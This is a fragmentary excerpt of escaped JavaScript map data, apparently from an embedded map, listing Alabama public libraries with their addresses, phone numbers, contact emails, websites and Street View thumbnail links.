ublic Library",description:"\x3cb\x3eWarrior Public Library\x3c/b\x3e\x3cbr\x3e10 First Street\x3cbr\x3eWarrior, AL 35180-1500\x3cbr\x3e205-647-3006\x3cbr\x3e205-647-9280\x3cbr\x3e\x3ca href=\"mailto:fpugh@bham.lib.al.us\" target=\"_blank\"\x3efpugh@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://warrior/lib.al.us/\" target=\"_blank\"\x3ehttp://warrior/lib.al.us/\x3c/a\x3e",infoWindow:{title:"Warrior Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x
...[SNIP]...
205-647-3006205-647-",dscr:"\x3cb\x3eWarrior Public Library\x3c/b\x3e\x3cbr\x3e10 First Street\x3cbr\x3eWarrior, AL 35180-1500\x3cbr\x3e205-647-3006\x3cbr\x3e205-647-9280\x3cbr\x3e\x3ca href=\"mailto:fpugh@bham.lib.al.us\" target=\"_blank\"\x3efpugh@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://warrior/lib.al.us/\" target=\"_blank\"\x3ehttp://warrior/lib.al.us/\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=
...[SNIP]...
blic Library",description:"\x3cb\x3eKennedy Public Library\x3c/b\x3e\x3cbr\x3e17885 Highway 96\x3cbr\x3eKennedy, AL 35574-0070\x3cbr\x3e205-596-3670\x3cbr\x3e205-593-3956\x3cbr\x3e\x3ca href=\"mailto:townofkennedy@frontier.com\" target=\"_blank\"\x3etownofkennedy@frontier.com\x3c/a\x3e",infoWindow:{title:"Kennedy Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Kennedy Public Library17885 Highway 96Kennedy, AL 35574-0070205-596-3670205-593",dscr:"\x3cb\x3eKennedy Public Library\x3c/b\x3e\x3cbr\x3e17885 Highway 96\x3cbr\x3eKennedy, AL 35574-0070\x3cbr\x3e205-596-3670\x3cbr\x3e205-593-3956\x3cbr\x3e\x3ca href=\"mailto:townofkennedy@frontier.com\" target=\"_blank\"\x3etownofkennedy@frontier.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.585735,-87.986050\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
description:"\x3cb\x3eMary Wallace Cobb Memorial Library\x3c/b\x3e\x3cbr\x3e110 First Avenue NW\x3cbr\x3eVernon, AL 35592-0357\x3cbr\x3e205-695-6123\x3cbr\x3e205-395-1006\x3cbr\x3e\x3ca href=\"mailto:nwclib@fayette.net\" target=\"_blank\"\x3enwclib@fayette.net\x3c/a\x3e",infoWindow:{title:"Mary Wallace Cobb Memorial Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Mary Wallace Cobb Memorial Library110 First Avenue NWVernon, AL 35592-035
...[SNIP]...
205-6",dscr:"\x3cb\x3eMary Wallace Cobb Memorial Library\x3c/b\x3e\x3cbr\x3e110 First Avenue NW\x3cbr\x3eVernon, AL 35592-0357\x3cbr\x3e205-695-6123\x3cbr\x3e205-395-1006\x3cbr\x3e\x3ca href=\"mailto:nwclib@fayette.net\" target=\"_blank\"\x3enwclib@fayette.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.757932,-88.109143\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
iption:"\x3cb\x3eMuscle Shoals Public Library\x3c/b\x3e\x3cbr\x3e1918 East Avalon Avenue\x3cbr\x3eMuscle Shoals, AL 35661-2402\x3cbr\x3e256-386-9212\x3cbr\x3e256-386-9211\x3cbr\x3e\x3ca href=\"mailto:hannah_mmu@lmn.lib.al.us\" target=\"_blank\"\x3ehannah_mmu@lmn.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://cityofmuscleshoals.com/Default.asp?ID=65\" target=\"_blank\"\x3ehttp://cityofmuscleshoals.com/Default.asp?ID=65\x3c/a\x3e",infoWindow:{title:"Muscle Shoals Publi
...[SNIP]...
",dscr:"\x3cb\x3eMuscle Shoals Public Library\x3c/b\x3e\x3cbr\x3e1918 East Avalon Avenue\x3cbr\x3eMuscle Shoals, AL 35661-2402\x3cbr\x3e256-386-9212\x3cbr\x3e256-386-9211\x3cbr\x3e\x3ca href=\"mailto:hannah_mmu@lmn.lib.al.us\" target=\"_blank\"\x3ehannah_mmu@lmn.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://cityofmuscleshoals.com/Default.asp?ID=65\" target=\"_blank\"\x3ehttp://cityofmuscleshoals.com/Default.asp?ID=65\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.g
...[SNIP]...
escription:"\x3cb\x3eSheffield Public Library\x3c/b\x3e\x3cbr\x3e316 North Montgomery Avenue\x3cbr\x3eSheffield, AL 35660-2709\x3cbr\x3e256-386-5633\x3cbr\x3e256-386-5608\x3cbr\x3e\x3ca href=\"mailto:chris_msh@lmn.lib.al.us\" target=\"_blank\"\x3echris_msh@lmn.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",infoWindow:{title:"Sheffield Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x
...[SNIP]...
256-",dscr:"\x3cb\x3eSheffield Public Library\x3c/b\x3e\x3cbr\x3e316 North Montgomery Avenue\x3cbr\x3eSheffield, AL 35660-2709\x3cbr\x3e256-386-5633\x3cbr\x3e256-386-5608\x3cbr\x3e\x3ca href=\"mailto:chris_msh@lmn.lib.al.us\" target=\"_blank\"\x3echris_msh@lmn.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
Library",description:"\x3cb\x3eSardis City Public Library\x3c/b\x3e\x3cbr\x3e1335 Sardis Drive\x3cbr\x3eSardis City, AL 35956\x3cbr\x3e256-593-5634\x3cbr\x3e256-593-6258\x3cbr\x3e\x3ca href=\"mailto:sardislibrary@hotmail.com\" target=\"_blank\"\x3esardislibrary@hotmail.com\x3c/a\x3e",infoWindow:{title:"Sardis City Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Sardis City Public Library1335 Sardis DriveSardis City, AL 35956256-593-5634256",dscr:"\x3cb\x3eSardis City Public Library\x3c/b\x3e\x3cbr\x3e1335 Sardis Drive\x3cbr\x3eSardis City, AL 35956\x3cbr\x3e256-593-5634\x3cbr\x3e256-593-6258\x3cbr\x3e\x3ca href=\"mailto:sardislibrary@hotmail.com\" target=\"_blank\"\x3esardislibrary@hotmail.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.174740,-86.120079\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
",description:"\x3cb\x3eWestside Public Library\x3c/b\x3e\x3cbr\x3e5151 Walnut Grove Road\x3cbr\x3eWalnut Grove, AL 35990-0007\x3cbr\x3e205-589-6699\x3cbr\x3e205-589-6699\x3cbr\x3e\x3ca href=\"mailto:weslibrary@otelco.net\" target=\"_blank\"\x3eweslibrary@otelco.net\x3c/a\x3e",infoWindow:{title:"Westside Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Westside Public Library5151 Walnut Grove RoadWalnut Grove, AL 35990-0007205-589",dscr:"\x3cb\x3eWestside Public Library\x3c/b\x3e\x3cbr\x3e5151 Walnut Grove Road\x3cbr\x3eWalnut Grove, AL 35990-0007\x3cbr\x3e205-589-6699\x3cbr\x3e205-589-6699\x3cbr\x3e\x3ca href=\"mailto:weslibrary@otelco.net\" target=\"_blank\"\x3eweslibrary@otelco.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.065374,-86.304536\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
,description:"\x3cb\x3eFayette County Memorial Library\x3c/b\x3e\x3cbr\x3e326 Temple Avenue N\x3cbr\x3eFayette , AL 35555-2383\x3cbr\x3e205-932-6625\x3cbr\x3e205-932-4152\x3cbr\x3e\x3ca href=\"mailto:gworthy1@hotmail.com\" target=\"_blank\"\x3egworthy1@hotmail.com\x3c/a\x3e",infoWindow:{title:"Fayette County Memorial Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Fayette County Memorial Library326 Temple Avenue NFayette , AL 35555-2383205-93",dscr:"\x3cb\x3eFayette County Memorial Library\x3c/b\x3e\x3cbr\x3e326 Temple Avenue N\x3cbr\x3eFayette , AL 35555-2383\x3cbr\x3e205-932-6625\x3cbr\x3e205-932-4152\x3cbr\x3e\x3ca href=\"mailto:gworthy1@hotmail.com\" target=\"_blank\"\x3egworthy1@hotmail.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.687451,-87.830907\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
iption:"\x3cb\x3eRussellville Public Library\x3c/b\x3e\x3cbr\x3e110 East Lawrence Street\x3cbr\x3eRussellville , AL 35653-2349\x3cbr\x3e256-332-1535\x3cbr\x3e256-332-1535\x3cbr\x3e\x3ca href=\"mailto:ruslib11@yahoo.com\" target=\"_blank\"\x3eruslib11@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.russellvillegov.com/library.shtml\" target=\"_blank\"\x3ehttp://www.russellvillegov.com/library.shtml\x3c/a\x3e",infoWindow:{title:"Russellville Public Libra
...[SNIP]...
",dscr:"\x3cb\x3eRussellville Public Library\x3c/b\x3e\x3cbr\x3e110 East Lawrence Street\x3cbr\x3eRussellville , AL 35653-2349\x3cbr\x3e256-332-1535\x3cbr\x3e256-332-1535\x3cbr\x3e\x3ca href=\"mailto:ruslib11@yahoo.com\" target=\"_blank\"\x3eruslib11@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.russellvillegov.com/library.shtml\" target=\"_blank\"\x3ehttp://www.russellvillegov.com/library.shtml\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.
...[SNIP]...
me:"Weatherford Public Library",description:"\x3cb\x3eWeatherford Public Library\x3c/b\x3e\x3cbr\x3e307 4th Avenue S\x3cbr\x3eRed Bay, AL 35582-0870\x3cbr\x3e256-356-9255\x3cbr\x3e\x3ca href=\"mailto:rblibrary@bellsouth.net\" target=\"_blank\"\x3erblibrary@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Weatherford Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Weatherford Public Library307 4th Avenue SRed Bay, AL 35582-0870256-356-9255rbl",dscr:"\x3cb\x3eWeatherford Public Library\x3c/b\x3e\x3cbr\x3e307 4th Avenue S\x3cbr\x3eRed Bay, AL 35582-0870\x3cbr\x3e256-356-9255\x3cbr\x3e\x3ca href=\"mailto:rblibrary@bellsouth.net\" target=\"_blank\"\x3erblibrary@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.440534,-88.141765\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
cription:"\x3cb\x3eEmma Knox Kenan Public Library\x3c/b\x3e\x3cbr\x3e312 South Commerce Street\x3cbr\x3eGeneva , AL 36340-0550\x3cbr\x3e334-684-2459\x3cbr\x3e334-684-2459\x3cbr\x3e\x3ca href=\"mailto:gpl@centurytel.net\" target=\"_blank\"\x3egpl@centurytel.net\x3c/a\x3e",infoWindow:{title:"Emma Knox Kenan Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Emma Knox Kenan Public Library312 South Commerce StreetGeneva , AL 36340-055033",dscr:"\x3cb\x3eEmma Knox Kenan Public Library\x3c/b\x3e\x3cbr\x3e312 South Commerce Street\x3cbr\x3eGeneva , AL 36340-0550\x3cbr\x3e334-684-2459\x3cbr\x3e334-684-2459\x3cbr\x3e\x3ca href=\"mailto:gpl@centurytel.net\" target=\"_blank\"\x3egpl@centurytel.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.036576,-85.865514\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
Pub Lib",description:"\x3cb\x3eMcGregor-McKinney Pub Lib\x3c/b\x3e\x3cbr\x3e101 East Fulton Street\x3cbr\x3eHartford, AL 36344\x3cbr\x3e334-588-2384\x3cbr\x3e334-588-2384\x3cbr\x3e\x3ca href=\"mailto:mmplhartford@centurytel.net\" target=\"_blank\"\x3emmplhartford@centurytel.net\x3c/a\x3e",infoWindow:{title:"McGregor-McKinney Pub Lib",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"McGregor-McKinney Pub Lib101 East Fulton StreetHartford, AL 36344334-588-238433",dscr:"\x3cb\x3eMcGregor-McKinney Pub Lib\x3c/b\x3e\x3cbr\x3e101 East Fulton Street\x3cbr\x3eHartford, AL 36344\x3cbr\x3e334-588-2384\x3cbr\x3e334-588-2384\x3cbr\x3e\x3ca href=\"mailto:mmplhartford@centurytel.net\" target=\"_blank\"\x3emmplhartford@centurytel.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.098167,-85.696843\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
lic Library",description:"\x3cb\x3eSamson Public Library\x3c/b\x3e\x3cbr\x3e200 North Johnson Street\x3cbr\x3eSamson, AL 36477\x3cbr\x3e334-898-7806\x3cbr\x3e334-898-7806\x3cbr\x3e\x3ca href=\"mailto:samsonpl@centurytel.net\" target=\"_blank\"\x3esamsonpl@centurytel.net\x3c/a\x3e",infoWindow:{title:"Samson Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Samson Public Library200 North Johnson StreetSamson, AL 36477334-898-7806334-89",dscr:"\x3cb\x3eSamson Public Library\x3c/b\x3e\x3cbr\x3e200 North Johnson Street\x3cbr\x3eSamson, AL 36477\x3cbr\x3e334-898-7806\x3cbr\x3e334-898-7806\x3cbr\x3e\x3ca href=\"mailto:samsonpl@centurytel.net\" target=\"_blank\"\x3esamsonpl@centurytel.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.116584,-86.045866\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
y",description:"\x3cb\x3eSlocomb Public Library\x3c/b\x3e\x3cbr\x3e107 North Washington Street\x3cbr\x3eSlocomb, AL 36375-0330\x3cbr\x3e334-886-9009\x3cbr\x3e334-886-3729\x3cbr\x3e\x3ca href=\"mailto:slocombpubliclibrary@yahoo.com\" target=\"_blank\"\x3eslocombpubliclibrary@yahoo.com\x3c/a\x3e",infoWindow:{title:"Slocomb Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Slocomb Public Library107 North Washington StreetSlocomb, AL 36375-0330334-886-",dscr:"\x3cb\x3eSlocomb Public Library\x3c/b\x3e\x3cbr\x3e107 North Washington Street\x3cbr\x3eSlocomb, AL 36375-0330\x3cbr\x3e334-886-9009\x3cbr\x3e334-886-3729\x3cbr\x3e\x3ca href=\"mailto:slocombpubliclibrary@yahoo.com\" target=\"_blank\"\x3eslocombpubliclibrary@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.107661,-85.591453\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
,description:"\x3cb\x3eJames C. Poole Jr. Memorial Library\x3c/b\x3e\x3cbr\x3e420 Prairie Avenue\x3cbr\x3eEutaw, AL 35462-1178\x3cbr\x3e205-372-9026\x3cbr\x3e205-372-9026\x3cbr\x3e\x3ca href=\"mailto:mjoygibson@yahoo.com\" target=\"_blank\"\x3emjoygibson@yahoo.com\x3c/a\x3e",infoWindow:{title:"James C. Poole Jr. Memorial Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"James C. Poole Jr. Memorial Library420 Prairie AvenueEutaw, AL 35462-117
...[SNIP]...
205-37",dscr:"\x3cb\x3eJames C. Poole Jr. Memorial Library\x3c/b\x3e\x3cbr\x3e420 Prairie Avenue\x3cbr\x3eEutaw, AL 35462-1178\x3cbr\x3e205-372-9026\x3cbr\x3e205-372-9026\x3cbr\x3e\x3ca href=\"mailto:mjoygibson@yahoo.com\" target=\"_blank\"\x3emjoygibson@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.841493,-87.887991\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
:"Akron Public Library",description:"\x3cb\x3eAkron Public Library\x3c/b\x3e\x3cbr\x3eOak Street\x3cbr\x3eAkron, AL 35441-0008\x3cbr\x3e205-372-3148\x3cbr\x3e205-372-3148\x3cbr\x3e\x3ca href=\"mailto:akron@hotmail.com\" target=\"_blank\"\x3eakron@hotmail.com\x3c/a\x3e",infoWindow:{title:"Akron Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Akron Public LibraryOak StreetAkron, AL 35441-0008205-372-3148205-372-3148akron",dscr:"\x3cb\x3eAkron Public Library\x3c/b\x3e\x3cbr\x3eOak Street\x3cbr\x3eAkron, AL 35441-0008\x3cbr\x3e205-372-3148\x3cbr\x3e205-372-3148\x3cbr\x3e\x3ca href=\"mailto:akron@hotmail.com\" target=\"_blank\"\x3eakron@hotmail.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.858861,-87.726379\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
unty-Greensboro Library",description:"\x3cb\x3eHale County-Greensboro Library\x3c/b\x3e\x3cbr\x3e1103 Main Street\x3cbr\x3eGreensboro, AL 36744-0399\x3cbr\x3e334-624-3409\x3cbr\x3e\x3ca href=\"mailto:halecountylibrar@bellsouth.net\" target=\"_blank\"\x3ehalecountylibrar@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Hale County-Greensboro Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Hale County-Greensboro Library1103 Main StreetGreensboro, AL 36744-0399334-624-",dscr:"\x3cb\x3eHale County-Greensboro Library\x3c/b\x3e\x3cbr\x3e1103 Main Street\x3cbr\x3eGreensboro, AL 36744-0399\x3cbr\x3e334-624-3409\x3cbr\x3e\x3ca href=\"mailto:halecountylibrar@bellsouth.net\" target=\"_blank\"\x3ehalecountylibrar@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.703970,-87.592775\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
brary",description:"\x3cb\x3eMoundville Public Library\x3c/b\x3e\x3cbr\x3e411 Market Street\x3cbr\x3eMoundville, AL 35474-0336\x3cbr\x3e205-371-2283\x3cbr\x3e205-371-2283\x3cbr\x3e\x3ca href=\"mailto:mpl@mound.net\" target=\"_blank\"\x3empl@mound.net\x3c/a\x3e",infoWindow:{title:"Moundville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Moundville Public Library411 Market StreetMoundville, AL 35474-0336205-371-2283",dscr:"\x3cb\x3eMoundville Public Library\x3c/b\x3e\x3cbr\x3e411 Market Street\x3cbr\x3eMoundville, AL 35474-0336\x3cbr\x3e205-371-2283\x3cbr\x3e205-371-2283\x3cbr\x3e\x3ca href=\"mailto:mpl@mound.net\" target=\"_blank\"\x3empl@mound.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.997513,-87.627885\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ary",description:"\x3cb\x3eAbbeville Memorial Library\x3c/b\x3e\x3cbr\x3e301 Kirkland Street\x3cbr\x3eAbbeville, AL 36310-2419\x3cbr\x3e334-585-2818\x3cbr\x3e334-585-2818\x3cbr\x3e\x3ca href=\"mailto:abbmem@graceba.net\" target=\"_blank\"\x3eabbmem@graceba.net\x3c/a\x3e",infoWindow:{title:"Abbeville Memorial Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Abbeville Memorial Library301 Kirkland StreetAbbeville, AL 36310-2419334-585-28",dscr:"\x3cb\x3eAbbeville Memorial Library\x3c/b\x3e\x3cbr\x3e301 Kirkland Street\x3cbr\x3eAbbeville, AL 36310-2419\x3cbr\x3e334-585-2818\x3cbr\x3e334-585-2818\x3cbr\x3e\x3ca href=\"mailto:abbmem@graceba.net\" target=\"_blank\"\x3eabbmem@graceba.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.567350,-85.250336\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
",description:"\x3cb\x3eBlanche R. Solomon Memorial Library\x3c/b\x3e\x3cbr\x3e17 Park Street\x3cbr\x3eHeadland, AL 36345-1747\x3cbr\x3e334-693-2706\x3cbr\x3e334-693-5023\x3cbr\x3e\x3ca href=\"mailto:dededcoe@aol.com\" target=\"_blank\"\x3edededcoe@aol.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.snowhill.com/\" target=\"_blank\"\x3ehttp://www.snowhill.com/\"dede/index.html\x3c/a\x3e",infoWindow:{title:"Blanche R. Solomon Memorial Library",basics:"\x3
...[SNIP]...
334-693",dscr:"\x3cb\x3eBlanche R. Solomon Memorial Library\x3c/b\x3e\x3cbr\x3e17 Park Street\x3cbr\x3eHeadland, AL 36345-1747\x3cbr\x3e334-693-2706\x3cbr\x3e334-693-5023\x3cbr\x3e\x3ca href=\"mailto:dededcoe@aol.com\" target=\"_blank\"\x3edededcoe@aol.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.snowhill.com/\" target=\"_blank\"\x3ehttp://www.snowhill.com/\"dede/index.html\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnai
...[SNIP]...
escription:"\x3cb\x3eHouston-Love Memorial Library\x3c/b\x3e\x3cbr\x3e212 West Burdeshaw Street\x3cbr\x3eDothan, AL 36303-1369\x3cbr\x3e334-793-9767\x3cbr\x3e334-793-6645\x3cbr\x3e\x3ca href=\"mailto:blforbus@yahoo.com\" target=\"_blank\"\x3eblforbus@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.houstonlovelibrary.org\" target=\"_blank\"\x3ewww.houstonlovelibrary.org\x3c/a\x3e",infoWindow:{title:"Houston-Love Memorial Library",basics:"\x3cdiv transclude=\"i
...[SNIP]...
334-",dscr:"\x3cb\x3eHouston-Love Memorial Library\x3c/b\x3e\x3cbr\x3e212 West Burdeshaw Street\x3cbr\x3eDothan, AL 36303-1369\x3cbr\x3e334-793-9767\x3cbr\x3e334-793-6645\x3cbr\x3e\x3ca href=\"mailto:blforbus@yahoo.com\" target=\"_blank\"\x3eblforbus@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.houstonlovelibrary.org\" target=\"_blank\"\x3ewww.houstonlovelibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26
...[SNIP]...
description:"\x3cb\x3eLena Cagle Public Library\x3c/b\x3e\x3cbr\x3e116 Jim B. Thomas Avenue\x3cbr\x3eBridgeport, AL 35740-0086\x3cbr\x3e256-495-2259\x3cbr\x3e256-495-3611\x3cbr\x3e\x3ca href=\"mailto:cbridgep@bellsouth.net\" target=\"_blank\"\x3ecbridgep@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Lena Cagle Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Lena Cagle Public Library116 Jim B. Thomas AvenueBridgeport, AL 35740-0086256-4",dscr:"\x3cb\x3eLena Cagle Public Library\x3c/b\x3e\x3cbr\x3e116 Jim B. Thomas Avenue\x3cbr\x3eBridgeport, AL 35740-0086\x3cbr\x3e256-495-2259\x3cbr\x3e256-495-3611\x3cbr\x3e\x3ca href=\"mailto:cbridgep@bellsouth.net\" target=\"_blank\"\x3ecbridgep@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.947984,-85.713690\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
rary",description:"\x3cb\x3eStevenson Public Library\x3c/b\x3e\x3cbr\x3e106 West Main Street\x3cbr\x3eStevenson, AL 35772-3564\x3cbr\x3e256-437-3008\x3cbr\x3e256-437-0031\x3cbr\x3e\x3ca href=\"mailto:spl0031@bellsouth.net\" target=\"_blank\"\x3espl0031@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://stevensonfriends.org/library.html\" target=\"_blank\"\x3ehttp://stevensonfriends.org/library.html\x3c/a\x3e",infoWindow:{title:"Stevenson Public Library",basics:
...[SNIP]...
256-437-300",dscr:"\x3cb\x3eStevenson Public Library\x3c/b\x3e\x3cbr\x3e106 West Main Street\x3cbr\x3eStevenson, AL 35772-3564\x3cbr\x3e256-437-3008\x3cbr\x3e256-437-0031\x3cbr\x3e\x3ca href=\"mailto:spl0031@bellsouth.net\" target=\"_blank\"\x3espl0031@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://stevensonfriends.org/library.html\" target=\"_blank\"\x3ehttp://stevensonfriends.org/library.html\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?
...[SNIP]...
",description:"\x3cb\x3eGardendale-Marth Moore Library\x3c/b\x3e\x3cbr\x3e995 Mt Olive Road\x3cbr\x3eGardendale, AL 35071-4654\x3cbr\x3e205-631-6639\x3cbr\x3e205-631-0146\x3cbr\x3e\x3ca href=\"mailto:csmith@bham.lib.al.us\" target=\"_blank\"\x3ecsmith@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.gardendale.lib.al.us\" target=\"_blank\"\x3ehttp://www.gardendale.lib.al.us\x3c/a\x3e",infoWindow:{title:"Gardendale-Marth Moore Library",basics:"\x3cdiv tra
...[SNIP]...
205-631",dscr:"\x3cb\x3eGardendale-Marth Moore Library\x3c/b\x3e\x3cbr\x3e995 Mt Olive Road\x3cbr\x3eGardendale, AL 35071-4654\x3cbr\x3e205-631-6639\x3cbr\x3e205-631-0146\x3cbr\x3e\x3ca href=\"mailto:csmith@bham.lib.al.us\" target=\"_blank\"\x3ecsmith@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.gardendale.lib.al.us\" target=\"_blank\"\x3ehttp://www.gardendale.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x
...[SNIP]...
y",description:"\x3cb\x3eGraysville Public Library\x3c/b\x3e\x3cbr\x3e315 South Main Street\x3cbr\x3eGraysville, AL 35073-1404\x3cbr\x3e205-674-3040\x3cbr\x3e205-674-3296\x3cbr\x3e\x3ca href=\"mailto:jmoore@bham.lib.al.us\" target=\"_blank\"\x3ejmoore@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://graysville.lib.al.us/\" target=\"_blank\"\x3ehttp://graysville.lib.al.us/\x3c/a\x3e",infoWindow:{title:"Graysville Public Library",basics:"\x3cdiv transclude=\"i
...[SNIP]...
205-674-",dscr:"\x3cb\x3eGraysville Public Library\x3c/b\x3e\x3cbr\x3e315 South Main Street\x3cbr\x3eGraysville, AL 35073-1404\x3cbr\x3e205-674-3040\x3cbr\x3e205-674-3296\x3cbr\x3e\x3ca href=\"mailto:jmoore@bham.lib.al.us\" target=\"_blank\"\x3ejmoore@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://graysville.lib.al.us/\" target=\"_blank\"\x3ehttp://graysville.lib.al.us/\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90
...[SNIP]...
